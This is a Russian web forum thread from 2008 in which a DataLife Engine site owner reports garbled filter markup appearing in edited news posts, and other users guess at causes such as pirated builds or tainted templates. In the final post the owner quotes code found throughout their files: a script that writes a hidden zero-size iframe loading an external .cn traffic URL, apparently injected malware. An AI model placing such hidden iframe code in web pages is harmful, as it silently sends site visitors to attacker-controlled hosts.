[help]добавляю новости....

Тема в разделе "DLE", создана пользователем index111, 5 апр 2008.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    Добавляю новости, потом когда хочу отредактировать везде код

    PHP:
    --><!--/filterк--><!--/filterк--><!--/filterк--><!--/filterк--><!--/filterк--><!--/filterк--><!--/filterт--><!--/filterс--><!--/filter

    что за фигня????!:nezn::bc:
     
  2. Barthez

    Barthez

    Регистр.:
    28 мар 2007
    Сообщения:
    265
    Симпатии:
    169
    Ты случайно не сборку левую юзаеш? Вообще не советую их использовать.
     
  3. dos03

    dos03 -----

    Регистр.:
    9 мар 2007
    Сообщения:
    871
    Симпатии:
    428
    Если добавляшь через РСС, то возможно эта фигня в коде той страницы, с которой взял новость.
    При обычном добавлении такого быть не должно.
     
  4. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    не не сборку юзаю от мид теама качал отсюда, новости раньше норм добалвлял недели две не добавлял щас начал....и такая фигня
    добавлять хоть через сайт хоть через админку всё равно также:nezn:
     
  5. JC

    JC Бог пикселей

    Регистр.:
    4 янв 2008
    Сообщения:
    303
    Симпатии:
    401
    А модули ставил какие-то в это время? Может они что-то сглючили...
     
  6. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    нет ничего не ставил,даже если пишешь просто

    ЫЫЫЫЫЫЫЫЫЫЫ

    потом начинаешь редактировать.......такие же фигни --><!--/filterк:nezn:
     
  7. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    сейчас на другом сайте зашёл в админку решил шаблон сменить там где надпись "причина отключения сайта" было написанно нормально сменил шаблон теперь там такая фигня
    PHP:
    --><!--/filter---><!--/filter>--><!--/filter&--><!--/filtert--><!--/filter!--><!--/filter---><!--/filterf--><!--/filterl--><!--/filtere--><!--/filterа--><!--/filter---><!--/filter>--><!--/filter&--><!--/filtert--><!--/filter!--><!--/filter---><!--/filterf--><!--/filterl--><!--/filtere--><!--/filterт--><!--/filter---><!--/filter>--><!--/filter&--><!--/filtert--><!--/filter!--><!--/filter---><!--/filterf--><!--/filterl--><!--/filtere--><!--/filterн--><!--/filter---><!--/filter>--><!--/filter&--><!--/filtert--><!--/filter!--><!--/filter---><!--/filterf--><!--/filterl--><!--/filtere--><!--/filterх--><!--/filter---><!--/filter>--><!--/filter&--><!--/filtert--><!--/filter!--><!--/filter---><!--/filterf--><!--/filterl--><!--/filtere--><!--/filterд-->
    ставлю обратно шаблон дефолтовый и эта же фигня.....:bc:
     
  8. Barthez

    Barthez

    Регистр.:
    28 мар 2007
    Сообщения:
    265
    Симпатии:
    169
    В файле Parse.class.php ищещ слово fliterok и тд... И Выкладываеш код сюда на расмотрение>
     
  9. JC

    JC Бог пикселей

    Регистр.:
    4 янв 2008
    Сообщения:
    303
    Симпатии:
    401
    А шаблоны случайно не французиков с 4dle.info?
     
  10. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    не нашёл там...но в коде нашёл....
    PHP:
    <!-- Link.Ru --><script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?mytraf" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script><!-- /Link.Ru -->
    что он там делает интересно....такой же код был в шаблоне нова стайл 2(зелённый который)
    хмм....во всех файлах этот код:confused:
     

    Вложения:

Статус темы:
Закрыта.